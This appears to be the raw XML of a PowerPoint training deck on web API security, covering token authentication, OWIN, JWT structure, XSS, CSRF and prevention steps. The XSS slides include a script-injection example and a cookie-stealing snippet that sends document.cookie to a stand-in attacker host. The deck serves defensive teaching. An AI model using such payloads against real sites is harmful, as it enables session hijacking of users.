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79" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="284" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="285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77" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="259" r:id="rId19"/>
    <p:sldId id="267" r:id="rId20"/>
    <p:sldId id="266" r:id="rId21"/>
    <p:sldId id="261" r:id="rId22"/>
    <p:sldId id="262" r:id="rId23"/>
    <p:sldId id="263" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="265" r:id="rId26"/>
    <p:sldId id="281" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="268" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="269" r:id="rId32"/>
    <p:sldId id="276" r:id="rId33"/>
    <p:sldId id="270" r:id="rId34"/>
    <p:sldId id="271" r:id="rId35"/>
    <p:sldId id="272" r:id="rId36"/>
    <p:sldId id="273" r:id="rId37"/>
    <p:sldId id="274" r:id="rId38"/>
    <p:sldId id="275" r:id="rId3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xample.com/search?query=Ala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ugoijs.com/sugoi-server/parameters-validation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3979391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By:- Vishal Garg and Shivam Sahu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3003798"/>
            <a:ext cx="48600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WEB API SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 4" descr="JKTs Logo - Sma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285750"/>
            <a:ext cx="1466850" cy="276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/>
              <a:t> Sensitive Data Exposure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encryption in transit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unable to properly secure sensitive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E.g.: - User information, credit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card information, session tokens,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passwords etc.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ncryption in transit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 exposing sensitive data, you must use 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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87144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Broken Access Control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Missing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inadequate access control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ttacker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gain control of other users accounts, alter access privileges,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change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26103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/>
              <a:t>Parameter Tampering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anipulation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Usually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stored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cookies, hidden form fields, or URL query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 success depends on integrity and logic validation mechanism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errors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can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 in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consequences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XSS, SQL Injection, file inclusion, and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path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disclosure attacks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E.g.:-harmful website, program, instant message, blog or e-mail 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validate URL parameters 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20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191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Man-In-The-Middle-Attack (MITM)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Attacker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secretly altering, intercepting or relaying communications between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interacting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Transport layer encryption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(TLS)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both SSL and TLS in your APIs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09750"/>
            <a:ext cx="3095625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97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52550"/>
            <a:ext cx="2495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5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Content Placeholder 4" descr="securitypattern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486401" y="1200150"/>
            <a:ext cx="3657600" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1276350"/>
            <a:ext cx="5486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How token based authentication actually works?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client application first sends a request to Authentication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server endpoint with an appropriate credential.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If the username/password are correct then the Authentication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server send a token to the client as a response. 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This token contains enough data to identify a particular user and an expiry time.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The client application then uses the token to access the restricted resources in next requests till the token is valid.</a:t>
            </a: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Token authentication is a 2 step process.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User pass his credentials to the Authorization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Server returns security token if credentials are correct.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 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Based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350"/>
            <a:ext cx="838200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0" y="895350"/>
            <a:ext cx="9144000" cy="4248150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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Why We Need token based authentication?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Allows users to stay logged onto a website without the use of cookies.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Tokens are more secure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because they can be used to replace a user's actual credentials.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Scalability of Servers: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The token sent to the server is self contained which holds all the user information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Loosely Coupling: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Your front-end application is not coupled with specific authentication mechanism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Mobile Friendly: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Cookies and browsers like each other, but storing cookies on native platforms (Android,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Windows Phone) is not a trivial task.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OWIN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OWIN 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76400" y="1664245"/>
            <a:ext cx="7315200" cy="2995737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Open Web Interface for.NET (OWIN) is an open-source specification that describes an abstraction layer between web servers and application components.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It defines a standard interface between .NET web servers and web applications. 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primary goal of OWIN is to decouple the server and application, encouraging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development of small and focused application.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Components/Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="owner-resource-authentication-flow.jp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1676400" y="1504950"/>
            <a:ext cx="6937439" cy="2324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191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Components/Architecture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467600" cy="326970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following are the principal components of this authentication mode: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Resource server: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It holds the resource and protects the resource from unauthorized access.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Resource owner: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It requests the resource base on needs.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Authorization server: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A server that authenticates the resource owner identity and issues the access token to the client.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Client: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It is an application that requests access on a resource on behalf of the resource owner.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Api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security is important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Token Based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 of OWIN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Basic idea of JWT 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OWIN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14600" y="895350"/>
            <a:ext cx="5629275" cy="378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8358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67000" y="742950"/>
            <a:ext cx="5703570" cy="4120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38400" y="819150"/>
            <a:ext cx="5737860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OWIN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/>
              <a:t>What is Access Token ?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047750"/>
            <a:ext cx="7620000" cy="40957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is a credential that can be used by an application to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an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 Tokens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can be either an opaque string or a JSON web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They inform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that the bearer of the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has been authorized to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 the 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API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perform specific actions specified by the scope that has been granted.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grant_type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URL parameter is required for the /token endpoint, which exchanges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a grant for real tokens. So the OAuth2 server knows what you are sending to it.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so you must specify it with the value password.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grant_type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=password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means that you are sending a username and a password to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the /token endpoint.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E.g.:-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123950"/>
            <a:ext cx="7543800" cy="39624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Step-1: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OWIN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Up class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tartup.Auth.cs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// Configure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OAuth Authorization Server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IAppBuilder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{      ….       }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Step-2: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class for validating user credentials asking for tokens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[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ApplicationOAuthProvider.cs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 : [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OAuthAuthorizationServerProvider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 Task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ValidateClientAuthentication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(..)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Task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GrantResourceOwnerCredentials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(..)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….}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public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override Task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TokenEndpoint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(…)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….}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26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OWIN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E.g.:-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86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vgarg\Desktop\WEB API SECURITY\OWIN err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666750"/>
            <a:ext cx="6013210" cy="126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vgarg\Desktop\WEB API SECURITY\OWIN succ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80540"/>
            <a:ext cx="6076656" cy="191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garg\Desktop\WEB API SECURITY\OWIN success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028950"/>
            <a:ext cx="4860308" cy="19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44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715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428750"/>
            <a:ext cx="7620000" cy="3581400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JSON Web Token (JWT) is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>JSON object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that is a safe way to represent a set of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information between two parties.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Powerful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token format used in HTTP headers in order to make some endpoint secure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Its an Open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token is composed of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header,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payload, and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signature.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Simply put, a JWT is just a string with the following format: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1200" y="44767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 it is used?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047750"/>
            <a:ext cx="7543800" cy="3886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Securely transfer information between any two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bodies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Digitally signed – information is verified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trusted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Compact –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JWT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send via URL,POST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request,HTTP header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contained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Contains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about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Avoiding query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than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05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JWT Structure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200150"/>
            <a:ext cx="7315200" cy="37338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Header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algorithm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HMAC SHA256 or RSA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[]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Typ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  type of JWT token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Payload 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contains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claims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claims are user details or additional metadata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Signature:-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05000" y="13525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header.payload.signature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 of security Threats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123950"/>
            <a:ext cx="7391400" cy="3810000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS (Cross site scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF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9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What is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398" y="1123948"/>
            <a:ext cx="6329363" cy="347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1676400" y="4629150"/>
            <a:ext cx="3200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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header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B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signature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Flow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 descr="2017-10-16-19-52-32.png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3276600" y="0"/>
            <a:ext cx="5867400" cy="3867150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3390900"/>
            <a:ext cx="76200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It relies on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signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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tokens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 which are sent by user to server with each request. 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put all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claims in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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json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web structure.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you </a:t>
            </a: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sign structure using asymmetric key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and encode whole thing in Base64.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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validating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signature,issuer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and audience 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latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Steps :-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 descr="JWT.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="10"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752599" y="1276348"/>
            <a:ext cx="5029200" cy="34575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2995737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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1. Create the HEADER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header is a JSON object in the following format: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1200" y="2495550"/>
            <a:ext cx="2362200" cy="1219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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "JWT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "HS256" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}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81400" y="2876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34000" y="24955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is a JWT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3657600" y="3257550"/>
            <a:ext cx="16764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410200" y="3105150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hashing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2. Create the PAYLOAD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payload component of the JWT is the data that‘s stored inside the JWT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This data is also referred to as the “claims” of the JWT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There are several different standard claims for the JWT payload, such as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iss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the issuer,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“sub” the subject, and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 “exp” the expiration time. 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Keep in mind that the size of the data will affect the overall size of the JWT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05000" y="23431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{ "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>": "b08f86af-35da-48f2-8fab-cef3904660bd"}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3. Create the SIGNATURE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signature is computed using the following pseudo code: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 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81200" y="3181350"/>
            <a:ext cx="6172200" cy="381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xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM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266950"/>
            <a:ext cx="6172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HMACSHA256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hmac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new HMACSHA256();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string key = Convert.ToBase64String(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hmac.Key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386715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Algorithm :- SecurityAlgorithms.HmacSha256Signature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4. Put All Three JWT Components Together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Now that we have created all three components, we can create the JWT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>header.payload.signature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 structure of the JWT,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simply need to combine the components, with periods (.) separating them.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724150"/>
            <a:ext cx="6400800" cy="1295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// JWT Token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>eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOiJiMDhmODZhZi0zNWRhLTQ4ZjItOGZhYi1jZWYzOTA0NjYwYmQifQ.-xN_h82PHVTCMA9vdoHrcZxH-x5mb11y1537t3rGzcM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JWT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7429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Steps to create JWT?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524000" y="1200150"/>
            <a:ext cx="7620000" cy="3276600"/>
          </a:xfrm>
        </p:spPr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Step 5. Verifying the JWT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JWT-attached API call to the application, can be validated.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It matches the JWT signature created by the authentication server.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If the signatures match, then that means the JWT is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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otherwise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invalid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by verifying the JWT, the application adds a layer of trust between itself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and the user.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XSS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047750"/>
            <a:ext cx="7467600" cy="342900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XSS?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Cross-Site Scripting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attacker makes the victim’s browser execute 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Ways to inject :-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parameters:-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E.g1:-When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type your search query and press submit, the generated URL may look something like this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[Original] : https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://</a:t>
            </a:r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example.com/search?query=Alan</a:t>
            </a:r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[XSS] : https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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://example.com/search?query=&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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E.g2:-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Could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steal the victim’s cookie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Image().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="http://attackerurl.com/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storecookie?cookie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="+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document.cookie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  <a:endPara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790825"/>
            <a:ext cx="1371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92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666750"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Injection attacks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047750"/>
            <a:ext cx="7522368" cy="36576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ross-site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scripting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ffective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way to stop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injection attack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nput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Validate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input: length / range / format and type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Achieve an implicit input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parameters validation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by using strong types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Constrain string inputs with regex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appropriate request size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limit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6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Ways to prevent XSS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1047750"/>
            <a:ext cx="7467600" cy="35814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user is validated – But we have disable this.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HTML output is encoded – We have disable this as well.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28788"/>
            <a:ext cx="43338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38425"/>
            <a:ext cx="45815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17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666750"/>
            <a:ext cx="6912768" cy="460648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00200" y="1123950"/>
            <a:ext cx="7543800" cy="40195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Cross-Site Request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Forgery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 malicious site sends a request to a vulnerable site where the user is currently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logged in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57350"/>
            <a:ext cx="4625721" cy="315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40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742950"/>
            <a:ext cx="6912768" cy="46064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Ways to prevent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CSRF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76400" y="971550"/>
            <a:ext cx="6912768" cy="299573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Anti-Forgery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338262"/>
            <a:ext cx="3000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76375"/>
            <a:ext cx="44767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33612"/>
            <a:ext cx="3381375" cy="271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03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95350"/>
            <a:ext cx="6912768" cy="460648"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Broken Authentication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0" y="1276350"/>
            <a:ext cx="7620000" cy="386715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Attacker bypass authentication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Missing or inadequate authentication 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Prevention:-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Solely authenticated users should be given access to the APIs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/tokens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ever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send credentials over connections that are not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trusted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reveal session ID in the Web URL.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8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923</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>329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Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Api Security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Security threats</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>Token Based Authentication</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr> OWIN </vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN</vt:lpstr>
      <vt:lpstr>OWIN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  <vt:lpstr>JWT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SedgwickUser</cp:lastModifiedBy>
  <cp:revision>111</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-01T16:27:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-06T16:36:45Z</dcterms:modified>
</cp:coreProperties>
</file>